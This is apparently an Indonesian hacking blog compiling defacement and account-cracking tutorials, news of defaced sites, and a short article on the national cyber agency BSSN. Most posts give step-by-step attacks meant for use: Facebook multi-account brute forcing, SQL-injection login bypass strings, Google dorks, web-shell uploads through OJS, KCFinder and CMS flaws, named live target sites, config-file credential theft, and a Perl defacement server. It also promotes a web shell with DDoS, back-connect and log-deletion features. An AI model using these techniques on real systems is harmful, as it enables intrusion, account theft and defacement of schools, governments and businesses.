Cara Hack Facebook Dengan Multi Brute Force

Ya ketemu lagi dengan saya Dark Cyber kali ini saya mau berbagi tutorial Cara Hack Facebook Dengan Multi Brute Force. Caranya gampang banget gan yang penting kalian simak dan baca sampai habis artikel ini dijamin work 100%. Oke langsung aja

Apa Itu Brute Force

Brute Force Attack adalah metode untuk meretas password ( password cracking ) dengan cara mencoba semua kemungkinan kombinasi yang ada pada “wordlist“. Metode ini keberhasilnya tergantung list password yang dimasukkan kedalam wordlist. Namun, proses untuk meretas password dengan menggunakan metode ini akan memakan banyak waktu. Lamanya waktu akan ditentukan oleh panjang dan kombinasi karakter password yang akan diretas. Nah... Sekarang Multi Bruteforce Facebook itu apa? Menurut saya, Multi Bruteforce Facebook ini adalah metode yang digunakan untuk mencari user facebook yang sesuai dengan password yang kita dimasukkan. Jadi kita menggunakan satu password untuk mengkombinasi ke siapa password itu sesuai dengan pengguna facebook. banyaknya list username pengguna Facebook bisa didapatkan dari Teman Facebook, Anggota Grup Facebook, dan list ID dari File yang kita masukkan ( Dikutip Dari blog All Tutor Cyber ).

Persiapan

• Handphone
• Aplikasi Termux
• Kuota
• Kesabaran

Kalau sudah mari langsung ke tutor cara menginstalnya

1. Buka aplikasi termuxnya. Kalau belum ada silahkan download di google play store.

2. Lalu ketikkan perintah berikut

$ apt update && apt upgrade
$ pkg install python2 git
$ pip2 install mechanize
$ git clone https://github.com/Senitopeng/fbbrute

3. Done ;)

Cara Menjalankannya

$ ls
$ cd mbf
$ python2 MBF.py 

Nah kalau sudah kalian tinggal pilih fitur yang mana, Ada 3 fitur

• Daftar teman
• Anggota grup
• ID dari File

Jika kalian memilih fitur no 1 dari teman Facebook kalian, kalian harus login dulu untuk mendapatkan ID teman fb kalian. Jika kalian memilih fitur no 2 dari Anggota Grup, kalian tinggal memasukkan ID grup facebook. Dan selanjutnya kalian tinggal memasukkan password untuk mencari ke username facebook siapa yang sesuai. Tunggu proses bruteforcenya berjalan.
Bagaimana? Gampang kan?

Dibawah ini saya akan memberikan beberapa password yang paling sering saya dapatkan digunakan orang :

• sayang 
• cintaku 
• iloveyou 
• doraemon 
• forever 
• imissyou 
• thn,bln, dan tgl lahir 
• marga,suku atau julukan

Ya mungkin cukup sekian tutorial yamg dapat saya berikan, Terima kasih telah berkunjung.
Selamat Beraktifitas.

Deface Dengan Bypass Admin

Deface Dengan Bypass Admin adalah poc deface yang memanfaatkan celah sqli yang ada pada halaman login.
Metode bypass admin ini termasuk poc paling mudah diantara poc yang lainnya
Baikla sekarang sediakan alat alat tempurnya :

• handpone atau lepi
• Internet
• kesabaran 

 Dork

• inurl:/admin/login.php 
• inurl:/administrator/ intitle:login 
• inurl:/admin/ intitle:panel 

Exploit

• Username : '=''or' atau '=' 'or' 
• Password : '=''or' atau '=' 'or' 

Tutorial

1. Dorking pake dork di atas. Di sini saya udah siapin target

Sumber : http://www.xmall75-tech.ga

2. Kalo udah nemu target, kolom username sama password diisi exploit tadi. Boleh '=''or' atau '=' 'or'. Setelah itu klik log in.

 

3. Boom!! Udah berhasil masuk deh (bagi yang vuln), kalo gak berhasil masuk cari lagi kembangin dorknya jangan maunya ngemis mulu kampang.

4. Serah lu deh mau ngapain, ngindex kek, apa mungkin mass delete lah. Eh jangan lah koplok kasian kalo mass delete :"v Udah mungkin gitu aja untuk tutor kali ini. Satu kalimat buat kalian semua, semoga bisa menginspirasi. "Jangan mudah menyerah, k0nd0m masih banyak".

Terimakasih telah berkunjung ke blog darksec, tunggu tutorial tutorial menarik lainnya. Selamat Beraktivitas.

Tutorial Deface Metode OJS

Haloo ketemu lagi dengan saya, kali ini saya mau update artikel tentang Tutorial Deface Metode OJS.

Langsung saja gausah basa basi lagi

Bahan bahan

• Handphone/lepi
• Internet
• Dork
• Kopi

Dork

• intext:Journal "new submission" 
• inurl:/index.php/index/user/register 
• intext:about submission "Journal" 
• inurl:/index.php/ojs

Tutorial

1. Oke kita langsung masuk ke langkah pertama Dorking dulu ke Om google

dreamexploiter.blogspot.com

2. Pilih target yang vuln. Kalo gak ketemu kembangin lagi dork nya. Nah saya udah milih salah satu target buat di eksekusi , lalu klik Register liat gambar diatas yg ada anunya itu loh di dalam lingkaran merah.

dreamexploiter.blogspot.com

3. Setelah klik  muncul sesosok penampakan seperti gambar diatas diatas, di situ kalian isi Username , password dan lain lain cek gambarnya isi asal saja tapi Username dan Password jangan sembarangan yang lain gapapa ngasal isi yang penting penting saja ya

4. Di bagian akhir jangan lupa beri ceklis di bagian Author blablabla dan di bagian Reviewer blablabla terakhir klik Register

5. Next step klik New Submission itu yang udah saya kasih kotak merah

6. Setelah kalian memilih New Submission keluarlah penampakan seperti gambar diatas , lalu beri ceklis di semua kotak Submission Checklist dan pilih Save and Continue....

7. Setelah kalian tadi klik save adn continue muncul 1 penampakan lagi liat gambar diatas... lalu pilih Choose File , lalu upload Shell atau script deface kalian , kali ini saya coba upload shell mini. lalu pilih Save and Continue..

8. Nah file nya udah berhasil di upload...bingung nyari akses file nya? nah caranya gini simak baik" ya..
Exploitnya : http://www.targetmu.com/files/journals/1/articles/[iduser]/submission/original/[nama file].phtml

Oke jadi begitulah sedikit Tutorial Deface Metode OJS kalau masih bingung silahkan berkomentar.

Live target

http://ojs.akbidylpp.ac.id

http://ijies.sie.telkomuniversity.ac.id

http://ojs.unsulbar.ac.id

Cara install ngrok ditermux

Halo sobat DarkSec ketemu lagi sama saya admin yang paling gans. Mungkin sebagian dari kalian ada yang sudah tahu apa itu ngrok dan kegunaannya dan mungkin juga ada yang belum tau. oleh karena itu saya akan terlebih dahulu memberi sedikit penjelasan tentang apa itu Ngrok dan kegunaanya.

Ngrok merupakan proksi server untuk membuat jarungan privat melalui NAT atau Firewall untuk menghubungkan jaringan localhost ke internet menggunakan tunel yang aman. Untuk kegunaanya ngrok biasanya di gunakan di banyak keperluan jaringan seperti pengujian di perangkat mobile ataupun membuat jaringan privat untuk menjalankan layanan personal cloud yang bisa mengsingkronisasi file, atau menjalankan webmail dari hardware secara aman dengan enkripsi end-to-end.

Ngrok juga sangat berguna sekali untuk keperluan penertesting jika di kombinasikan dengan weeman, a-rat, maupun metasploit.
Ngrok bisa di gunakan di berbagai sistem oprasi seperti windows, linux, mac bahkan arm linux yaitu android, seperti judul di atas kali ini saya akan memberikan tutorial cara instal ngrok ditermux.
Langsung saja kita masuk terlebih dahulu ke tahapan penginstalannya.

1. Kita update dan upgrade dulu, Ketikkan perintah berikut

$ apt update && apt upgrade

2. Lanjut dengan mendownload file ngrok nya

$ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip

3. Setelah mendownload, Ketikkan perintah berikut untuk membuka zip nya

$ unzip ngrok-stable-linux-arm.zip

Selanjutnya kita lanjut cara menjalankan dan mengatur ngrok nya :

Daftar terlebih dahulu Disini
Setelah daftar kalian bisa login Disini

Setelah kalian masuk ke dashboard kalian, kalian tinggal memasukan auth tokennya,kalian tinggal salin kode tersebut yang ada pada dashboard kalian ke termux.

Setelah kalian berhasil memasukan auth tokennya kalian tinggal memasukan perintah berikut ini.

$ ./ngrok -h

Note : Tergantung kalian apakah kalian ingin menggunakan tcp ataupun http jika kalian ingin menggunakan http kalian tinggal mengetik perintah berikut.

$ ./ngrok http 8080

Berikut perintah jika ingin menggunakan tcp, port atau angka (4444) kalian bisa menggantinnya sesuka hati kalian.

$ ./ngrok tcp 1969

Ya mungkin cuma itu tutorial yang saya kasih, kalau ada pertanyaan silahkan berkomentar
Selamat beraktivitas

Cara install tools webdav ditermux

Ya ketemu lagi dengan saya Dark Cyber kali ini saya mau berbagi tutorial Cara install tools webdav ditermux. Caranya gampang banget gan yang penting kalian simak dan baca sampai habis artikel ini dijamin work 100%. Oke langsung aja

Persiapan

• Handphone
• Internet
• Aplikasi termux
• Kopi

Kalau sudah simak baik baik yah!..
1. Ketikkan kode berikut

$ apt update && apt upgrade

2. Selanjutnya ketikkan ini

$ apt install python

3. Kalau sudah ketikkan lagi kode berikut

$ pip2 install urllib3 chardet certifi idna requests

4.Ketikkan lagi

$ apt install openssl curl

5. Ketikkan lagi

$ pkg install libcurl

6. Berhubung saya males ngetik satu per satu jadi ini saya gabungin aja ya gan

$ mkdir webdav
$ cd sdcard
$ cd webdav
$ wget https://pastebin.com/raw/HnVyQPtR$mv HnVyQPtR webdav.py
$ chmod 777 webdav.py
$ python2 webdav.py

Note*Pindahin script deface anda ke folder webdav
Cara menjalankannya : http://target.com script.html

Ya mungkin begitulah sedikit tutorial tentang cara install webdav di termux, Kalau ada masalah silahkan berkomentar. Selamat beraktifitas

Cara Install Admin Finder Di Termux

Halo sobat DarkSec ketemu lagi dengan saya admin yang paling gans. Kali ini saya akan membuat tutorial Cara Install Admin Finder Di Termux, Caranya gampang banget kok simak baik baik yah!...

Bahan-bahan

• Handphone 
• Internet
• Aplikasi termux
• Kopi bila perlu

Oke sekarang kita mulai
1. Ketikkan perintah dibawah ini pada termux anda

1	$ apt update && apt upgrade

2. Lalu ketikkan lagi

1	$ apt install git

3. Setelah itu ketikkan lagi

1	$ apt install python2

4. Kalau sudah ketilkan lagi

1	$ git clone https://github.com/the-c0d3r/admin-finder.git

5. Terakhir ketikkan

1	$ cd admin-finder.py

Bagaimana mudah kan? Kalau ada masalah silahkan komentar saja dibawah nanti saya bales.
Oke sekian dulu tutorial kali ini selamat beraktifitas.

Situs Kratingdaeng Dijahili Hacker

Situs Kratingdaeng Dijahili Hacker - Lagi lagi peretasan didunia siber kembali terjadi,Kali ini hacker yang bernama SPEEDY-03 meretas situs resmi kratingdaeng.

Hacker tersebut telah mengubah tampilan depan situs tersebut dengan latar hitam dan pesan

HACKED BY SPEEDY-03

Upzzz Kratingdaeng Got Hacked !-

Typical Idiot Security

Greetz Team

Khunerable - SPEEDY-03 - PYS404 - Mirav - Grac3 - AnonGhost 

- Jje Incovers - Panataran -Magelang6etar

https://www.facebook.com/groups/TISofficialTEAM

 Hacker tersebut telah berhasil menyisipkan file bernama pwn.html disitus terkait

Berikut alamat situs yang diretas,:

• https://www.kratingdaeng.co.id/pwn.html

Berikut mirrornya :

• https://www.zone-h.org/mirror/id/31210741

Sampai berita ini dirilis belum ada tanda tanda perbaikan dari situs terkait. Kembali lagi hal ini harusnya menjadi peringatan kepada seluruh web developer & seluruh IT support website pemerintah agar lebih memperhatikan situsnya.

Deface Dengan CMS Formulasi

Halo sobat DarkSec kali ini saya mau share tutorial cara deface dengan cms formulasi.
Ini cara kedua untuk deface situs sekolah selain cara balitbang.

Bahan-bahan

• Dork (Sudah saya siapin dibawah )
• Exploit (ada dibawah gan )
• Shell ber ext .php5 .php.xxxjpg .php.fla
• Siapkan kesabaran Anda

Dork

• inurl:data-link- site:sch.id
• inurl:/?p=detberita&id=
• powered by Formulasi Free Opensource CMS

Exploit

• Adminpanel/ckeditor/kcfinder/browse.php
• Adminpanel/ckeditor/kcfinder/upload.php

1. Dorking target di google search engine

2. Cari situs yang masih vuln, Biar bisa diupload shell

3. Masukkan exploit

contoh : http://site.sch.id/[path]/adminpanel/ckeditor/kcfinder/browse.php

4. Upload shell kalian dengan ext yang diatas tadi kalo masih gak bisa ya kalian perbanyak ngaca lagi deh hehehe

5. Kalo sukses terupload, tinggal akses shellnya. Masukkan exploit ini
http://site.sch.id/[path]images/files/namashell.php

6. Kalo udah kebuka aksesnya, terserah kalian mau diapain. ditebas? Silahkan tapi jangan salahkan saya ya hehe sebaiknya backup dulu indexnya, Hargai adminnya gan dia sudah susah payah membuat website dan kamu mau merusaknya begitu saja?:D

oke sekian tutor dari saya, selamat beraktivitas.

Tutorial Deface With Csrf Balitbang 3.5.3

Halo sobat DarkSec Ketemu lagi nih, Kali ini saya mau kasih tau Tutorial Deface Dengan Csrf Balitbang 3.5.3
Teknik ini biasanya situs sekolah yang menjadi korbannya jadi kalau kamu mau deface web sekolah teknik ini sangat cocok. Oke langsung saja

Bahan-bahan :

• Shell
• Csrf online klik disini
• Script Deface
• Dork : inurl:/member/daftar.php

ok langsung ke tutornya

1. Pertama dorking ke google

2. Setelah dapet target masukin ke online toolnya lalu next

3. isi capthanya -> klik GO dan akan muncul seperti ini, setelah itu text klik disini

4. setelah itu muncul seperti gambar dibawah.. lalu klik text Lewat sini brade!!

5. lalu pilih text Klik disini untuk bikin SESSION -> lalu masukan file ente dan klik simpan

6. jika hasilnya seperti ini maka sukses.. silahkan ente akses url yang ada dibawahnya

7. Booommm. Upload shell succes.

Ya begitulah sedikit tentang Tutorial Deface With Csrf Balitbang 3.5.3 Kalau kurang paham silahkan berkomentar Atau liat video dibawah ini

Semoga bermanfaat.

Tutorial Deface Dengan KcFinder

Hallo Kembali Lagi Dengan Saya Dark Cyber

Kali Ini Saya Mau Ngasih Tutor Deface Dengan Poc KcFinder. Maklum Newbie hehe :'v

Oke langsung Saja Ketutor

PERSIAPAN

1. Dork

• inurl:/kcfinder/browse.php
• inurl:/kcfinder/upload.php

2. Lokal file

/kcfinder/upload/files/namascript.html

3. Siapkan kopi biar gak ngantuk.



Oke Sekarang Langkah Langkahnya, Simak Baik Baik Yah :v

• Masukkan Dork Diatas KeDalam Search Engine

• Cari Website Yang Perawan :v Eh Maaf Maksud Saya Yang Vuln hehe

• Kalo Udah Ketemu, Nanti Akan Ada Tempat Upload Seperti Yang Saya Tandain, Klik Upload

• Kalo Udah Pilih Shell atau Script Andalan Kamu.(biasanya kalo upload shell nyari websitenya susah susah gampang :'v)

• Nah Setelah Upload, Nanti Akan Ada Script Kamu Disitu. Disini Gua Mau Upload Script Deface
•  Tunggu Sebentar Kalo Muncul Eror Biasanya Karena EXTENSI FILE TIDAK SUPPORT Jadi Silahkan Kamu Perbanyak Ngaca Lagi wkwk :v Bercanda Euy Silahkan Cari Website Lain Atau Bisa Ditamper Data

• SARAN ( KALO DAPET WEBSITE YANG BISA UPLOAD SHELL, JANGAN LANGSUNG DITEBAS INDEXNYA, BACKUP DULU GAN KARENA BIKIN WEBSITE ITU GAK GAMPANG :) JADI HARGAILAH ADMINNYA)
• Kemudian Exploit URLnya  Dengan /kcfinder/upload/files/namascript.html 

• Kalo Udah Klik Enter. Jika Berhasil Maka  Akan Tampil Tuh Script Deface Kamu, Tapi Kalo Not Found Coba Cari Letak File Nya Biasanya Udah Diubah Sama Admin Websitenya

Oke mungkin cuma gini tutorial yang bisa saya bagi, Maaf kalau saya salah karena saya hanya seorang newbie :(. Sampai jumpa

Cara Jumping Diwebsite

Hallo sobat DarkSec kembali lagi dengan saya Dark Cyber, Kali ini saya akan kasih tau Cara Jumping Diwebsite.

di sini Saya anggap kalian sudah punya target yang sudah di pasang backdoor/shell
di web target anda,
kalau belum punya shell bisa ikuti cara upload shell di sini

Oke langsung aja ke intinya.
1. Pertama masuk ke Shell yang sudah kita tanam tadi lalu pilih jumping.
di sini saya pakai shell yang sudah ada tools jumpingnya. Atau bisa pake shell Pacman.

2. Disini kalian bisa lihat banyak nama domain yang muncul.

3. buka salah satu lalu cari confignya,
dan target saya kali ini joomla.
jadi yang harus saya cari adalah file configuration.php.
Jika CMS wordpress cari saja wp-config.php, jika CMS Lokomedia,
cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.

Perhatikan baris ini :
define('DB_HOST', 'localhost');

DB NAME = snkib17_snkib

DB USER = snkib17_snkib

DB PASSWORD = y8j3O0Np

DB HOST = localhost

Diatas adalah informasi mengenai Akses Database MySQL.
Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas,
kembali ke shell pertama.

4. Login adminer.

Isi semua kolom dengan data - data yang telah di peroleh pada file configurasi diatas tadi,
dan pilih masuk.

5. Setelah sukses login / kita cari tabel user dan edit.

Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah rubah aja dengan password yang kita inginkan.
untuk hash password md5 masuk aja di sini

Saya mencoba password zuki dan setelah di enskripsi menjadi 0ba52814546577aa10e7dff118247147
Lalu saya rubah password user nya dan saya ganti dengan password "zuki"
Saya sudah merubah dengan 0ba52814546577aa10e7dff118247147 dan saya klik confirm untuk menyimpan pengaturannya,
dan pada pengaturan selanjutnya klik Yes.
Berarti saya akan coba login dengan username ctt123 dan password ctt1234.

jika berhasil nanti kita akan masuk ke dalam dashboard adminnya.

Jika sudah terserah kalian mau diapain aja, Jangan lupa di backup file pentingnya dan jangan di rusak. Alangkah baiknya kalau kita mau membantu buat admin menutup bugnya

Kalo ingin cara lain cek video dibawah ini gan

Oke sekian cara jumping diwebsite, Pantau terus blog saya untuk mendapatkan tutorial terbaru lainnya Sampai jumpa.

Cara Bypas Disable Function With Pacman Shell

Hallo sobat DarkSec bertemu lagi dengan saya Dark Cyber. Kali ini mau share tentang Disable Functions Kesel gak sih kalo liat disable functions banyak banget kayak gini?

Gampang banget sebenernya nge bypass nya pake Shell yang ada Auto Disable Functions nya Kaya Pacman Shell dan masih banyak lagi shell yang lain , Gimana si cara bypass nya ? Gampang banget guys cara bypass nya cekidot liat dibawah

Pertama klik menu Disable Functions

Terus kalo udah ada pilihan php.ini Atau .htaccess Bisa liat dibawah

Terserah agan mau pilih yang mana kalo saya sih php.ini , nah kalo udah click here , terus back , kemudian muat ulang browser nya , kalo succes maka Disable Functions nya menjadi NONE ,bisa liat gambar Dibawah

Nahh gampang bukan? Hehe Mungkin segitu aja ya.
Kalau mau shellnya, kamu bisa klik yang dibawah

• Pacman Shell V.1
• Pacman Shell V.2

Oke sekian tutorial hari ini, Thanks to Mr.4c1L Cr0tZz dan All Member Pacman Corp.

Subdomain Situs Provinsi Jatim Dijahili Hacker

Subdomain Situs Provinsi Jatim Dijahili Hacker - Baru baru ini subdomain situs provinsi jawa timur telah dijahili hacker yang berkode nama D3D0T. Situs yang diretas memang  bukan domain utama melainkan hanya subdomannya. Peretas tersebut mengunggah sebuah file yang bernama lol.html pada situs tersebut.

Meski tidak merusak halaman depan, file yang bernama lol.html yang diunggah oleh sang peretas cukup menjadi bukti kalau sang hacker masuk secara ilegal.
Tidak ada pesan khusus yang ditinggalkan kepada provinsi jatim maupun kepada admin situs tersebut, Sepertinya hanya murni iseng saja. Beberapa nama juga terpampang jelas.
berikut pesan yang ditinggalkan :

Owned By D3D0T

[+]Indonesia Silent Code[+] Special Thanks To : T37S4K1T1 - 008 - Mr.21A - LCR999X - "Samael" - MUG1WARA - Jingklong - MR.RABBIT - Gend3ruw0 - ./Topi Miring - Yuu_Amr [+] 008 - BigHero - ./RosesDie - CL0NE - ./UZUMAK1 - D3D0T - Rhythm [+]

Berikut list situs yang diretas :

• https://dinsos.jatimprov.go.id/lol.html
• http://epasung.dinsos.jatimprov.go.id/lol.html
• http://finger.dinsos.jatimprov.go.id/lol.html
• http://silontar.dinsos.jatimprov.go.id/lol.html
• http://ppid.dinsos.jatimprov.go.id/lol.html

Sementara itu, halaman depan situs masih bisa diakses dan berfungsi sebagaimana mestinya.
Sekian Berita hari ini selamat beraktifitas. (Dark Cyber)

Pacman Shell V.2 Release

Halo sobat darksec ketemu lagi dengan saya admin yang paling gans hehehe. Kali ini saya akan share Pacman Shell V.2 yang baru saja rilis kemaren. Langsung aja cekidootttt

Tampilan login :

Dalemannya :

Berikut fiturnya :

• *Home
• *Info Website
• *Upload
• *Command
• *Mass Deface
• *Mass Delete
• *Config
• *Jumping
• *CPanel Crack
• *SMTP Grabber
• *Fake Root
• *Auto Edit User
• *Auto Edit Title
• *Zone-H
• *DefacerID
• *WP Auto Deface
• *CFTP Auto Deface
• *KRDP Shell
• *Network
• *About
• *Adminer
• *Tool
• *Admin Finder
• *Symlink
• *Symlink404
• *Whois
• *CGI Telnet
• *CSRF Online
• *DDos
• *Shell Scanner
• *Encode Decode
• *Back Connect
• *Disable Functions ( php.ini & .htaccess )
• *WPBF ( Wordpress brute force )
• *Delete logs
• *jQuery ( Auto Exploiter )
• *Reverse IP
• *Lokomedia
• *Bypass /etc/passwd
• *Streaming Bokep
• *Streaming Hentai
• *Kill ( Kill Your Shell :v )
• *Logout

Thanks buat orang orang yang membantu dalam pembuatan shell ini. Shell ini bukan 100% coding manual, Shell ini hasil recode dari shell IndoXploit dan tools dari N45HT. Tapi selebihnya itu hasil karya Pacman Corp sendiri.

Ambil disini bro
Oke mungkin cuma itu yang saya sampaikan terima kasih telah berkunjung ke blog saya.

Situs Gizi Indonesia Diretas Hacker

Situs Gizi Indonesia Diretas Hacker - Halo sobat DarkSec kali ini saya dapat berita terupdate.
Lagi lagi peretasan didunia siber tidak ada habisnya, kali ini situs yang menjadi korbannya adalah situs Gizi Indonesia
Peretas yang berkodenama SPEEDY-03 yang berasal dari team Typical Idiot Security tersebut berhasil membobol situs tersebut dan menyisipkan file yang dibuatnya didalam situs.

Peretas tersebut tidak meninggalkan pesan khusus, dia hanya menampilkan background hitam, nama team, dan teman teman peretas lainnya, dan tak lupa juga ada musik sebagai backsoundnya.
Berikut alamat situs yang diretas :

• https:///giziindonesia.co.id/lol.htm

Berikut pesan yang ditinggalkan :

HACKED BY SPEEDY-03

Typical Idiot Security
Greetz Team
Khunerable - SPEEDY-03 - PYS404 - Mirav - Grac3 - AnoaGhost - Jje Incovers - Panataran - Magelang6etar
https://www.facebook.com/TISofficialTEAM/


Motif dari peretasan ini sepertinya hanya iseng iseng saja.

Untuk mirror anda bisa lihat disini : 

• http://www.zone-h.org/mirror/id/31188442

Sampai berita ini dibuat belum ada tanda tanda
perbaikan dari admin situs. Semoga saja dia dapat memperbaiki bug pada situsnya.
Oke sekian dulu berita hari ini, pantau terus blog saya untuk mendapatkan artikel menarik lainnya Sampai jumpa. ( Dark Cyber )

Cara Socket Server Dengan Perl

Halo sobat DarkSec kali ini saya akan memberikan sedikit tutor tentang Cara Socket Server Dengan Perl. Sebelum saya mulai tutornya, saya mau mengucapkan terimakasih dahulu kepada Agus Setya R ( founder IndoXploit ).
Oke langsung saja ke tutorialnya, simak baik-baik.

Bahan Bahan

• Shell yang udah di tanem
• Script perl ( Ada dibawah )
• Pc/laptop ( hacdphone juga boleh )
• Internet
• Kopi

Langkah-langkahnya

Sebelumnya pastikan perl diwebsite yang udah anda tanem ON.

1. Copy script perlnya dibawah lalu anda edit. perl inilah yang nanti digunakan buat memebuka port. Oh iya untuk port bebas mau port berapa saja. Disini saya ubah portnya menjadi 2001, Ganti Hacked By Dark_Cyber menjadi nick anda. Lalu save dengan extensi .pl

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

#!/usr/bin/perl -w use strict; use IO::Socket; sub Wait { wait; # wait needed to keep <defunct> pids from building up } $SIG{CHLD} = \&Wait; my $server = IO::Socket::INET->new( LocalPort => 2001, # set port Type => SOCK_STREAM, Reuse => 1, Listen => 10) or die "$@\n"; my $client ; while($client = $server->accept()) { select $client; print $client "HTTP/1.0 200 OK\r\n"; print $client "Content-type: text/html\r\n\r\n"; print $client '<H1>Dark_Cyber</H1><BR><H2>Pacman Corp Team</H2><embed src="https://www.youtube.com/v/TmhibQ28GKE&autoplay=1&playlist=TmhibQ28GKE" wmode="transparent" type="application/x-shockwave-flash" height="0" width="0"></embed>'; # set your html content } continue { close($client); #kills hangs kill CHLD => -$$; }

2. upload script perlnya lewat shell anda masuk ke command lalu ketikan perintah

• perl iseng.pl

iseng.pl adalah nama file perl saya jadi sesuaikan dengan punyamu.

3. Kemudian ketikkan

• ps aux | grep 'iseng'

4. Kalau sudah selanjutnya kalian cek di browser http://site.co.li:2001

Lalu kita reverse ip site korban untuk mengetahui ada berapa website yang 1 server dengannya.

https://www.yougetsignal.com/tools/web-sites-on-web-server/

Lalu cek satu per satu domain hasil reverse ip tadi lalu tambahkan port 2001 dibelakangnya. Jika vuln maka akan muncul script anda tetapi jika error lebih baik tinggalkan saja hehehe.

Oke mungkin cuma itu saja tutorial kali ini kalau kurang jelas bisa komen saja atau kirim email ke saya darksec1407@gmail.com insya allah saya bales. Selamat beraktivitas.

Indonesia Resmi Miliki Badan Cyber dan Sandi Negara

Akhirnya Indonesia Resmi Miliki Badan Cyber dan Sandi Negara – Dengan pertimbangan bahwa bidang keamanan siber merupakan salah satu bidang pemerintahan yang perlu didorong dan diperkuat sebagai upaya meningkatkan pertumbuhan ekonomi nasional dan mewujudkan keamanan nasional, pemerintah memandang perlu dibentuk badan dengan menata Lembaga Sandi Negara menjadi Badan Siber dan Sandi Negara, guna menjamin terselenggaranya kebijakan dan program pemerintah di bidang keamanan siber.

Atas dasar pertimbangan tersebut, Badan Siber dan Sandi Negara (BSSN) telah resmi dibentuk setelah ditandatanganinya Peraturan Presiden (PP) Nomor 53 tahun 2017 oleh Presiden Joko Widodo pada 19 Mei 2017.

Dalam Perpres itu disebutkan, bahwa Badan Siber dan Sandi Negara yang selanjutnya disebut BSSN adalah lembaga pemerintah non kementerian, yang berada di bawah dan bertanggung jawab kepada Presiden melalui menteri yang menyelenggarakan koordinasi, sinkronisasi, dan pengendalian penyelenggaraan pemerintah di bidang politik, hukum, dan keamanan.

“BSSN dipimpin oleh Kepala,” bunyi Pasal 1 ayat (3) Perpres tersebut.

Menurut Perpres ini, BSS mempunyai tugas melaksanakan keamanan siber secara efektif dan efisien dengan memanfaatkan, mengembangkan, dan mengonsolidasikan semua unsur yang terkait dengan keamanan siber.

Tertera dalam isi Perpres yang ditetapkan pada tanggal 19 Mei 2017 oleh Joko Widodo (Jokowi), BSSN ini mempunyai tugas melaksanakan keamanan siber secara efektif dan efisien dengan memanfaatkan, mengembangkan, dan mengonsolidasikan semua unsur yang terkait dengan keamanan siber.

Dalam tugasnya, sesuai pada pasal 3, BSSN menyelenggarakan fungsi, seperti:

1. Penyusunan kebijakan teknis di bidang identifikasi, deteksi, proteksi, penanggulangan, pemulihan, pemantauan, evaluasi, pengendalian proteksi e-commerce, persandian, penapisan, diplomasi siber. pusat manajemen krisis siber, pusat kontak siber, sentra informasi, dukungan mitigasi, pemulihan penanggulangan kerentanan, insiden dan/atau serangan siber.
2. Pelaksanaan kebijakan teknis di bidang identifikasi, deteksi, proteksi, penanggulangan, pemulihan, pemantauan, evaluasi, pengendalian proteksi ecommerce, persandian, penapisan, diplomasi siber, pusat manajemen krisis siber, pusat kontak siber, sentra informasi, dukungan mitigasi, pemulihan penanggulangan kerentanan, insiden dan/atau serangan siber.
3. Pemantauan dan evaluasi kebijakan teknis di bidang identifikasi, deteksi, proteksi, penanggulangan, pemulihan, pemantauan, evaluasi, pengendalian proteksi e-commerce, persandian, penapisan, diplomasi siber, pusat manqjemen krisis siber, pusat kontak siber, sentra informasi, dukungan mitigasi, pemulihan penanggulangan kerentanan, insiden dan/atau serangan siber.
4. Pengoordinasian kegiatan fungsional dalam pelaksanaan tugas BSSN dan sebagai wadah.
5. Koordinasi bagi semua pemangku kepentingan.
6. Pelaksanaan pembinaan dan pemberian dukungan administrasi kepada seluruh unit organisasi di lingkungan BSSN.
7. Pengawasan atas pelaksanaan tugas BSSN.
8. Pelaksanaan dukungan yang bersifat substantif kepada seluruh unsur organisasi di lingkungan BSSN.
9. Pelaksanaan kerjasama nasional, regional, dan internasional dalam urusan keamanan siber.

Dalam praktiknya, BSSN akan bertanggung jawab kepada Presiden melalui Menteri Koordinator Politik Hukum dan Keamanan dan dipimpin oleh seorang kepala dan dibantu oleh Sekretariat Umum serta empat deputi yaitu, Deputi Bidang Identifikasi dan Deteksi, Deputi Bidang Proteksi, Deputi Bidang Penanggulangan dan Pemulihan, Deputi Bidang Pemantauan dan Pengendalian.

Kepala BSSN diangkat dan diberhentikan atas usul Menteri Koordinator Politik Hukum dan Keamanan sesuai dengan ketentuan perundang-undangan.
Sedangkan Sekretaris Umum dan Deputi diangkat dan diberhentikan oleh Presiden atas usul Kepala BSSN sesuai dengan ketentuan peraturan perundang-undangan.
Sementara Lembaga Sandi Negara dan Direktorat Keamanan Informasi di bawah Direktorat Jenderal Aplikasi dan Informatika, Kementerian Komunikasi dan Informatika akan melebur ke dalam BSSN.

Peralatan, pembiayaan, arsip dan dokumen pada Direktorat Keamanan Informasi Kementerian Komunikasi dan Informatika dan Indonesia Security Incident Response Team on Internet Infrastructure (ID-SIRTII) dan Lembaga Sandi Negara dialihkan ke BSSN.

Untuk pelaksanaan tugas di bidang persandian saat ini masih tetap dilakukan oleh Lembaga Sandi Negara hingga selesainya penataan organisasi BSSN. Begitu pula dengan tugas bidang keamanan di Direktorat Keamanan Informasi Kementerian Komunikasi dan Informatika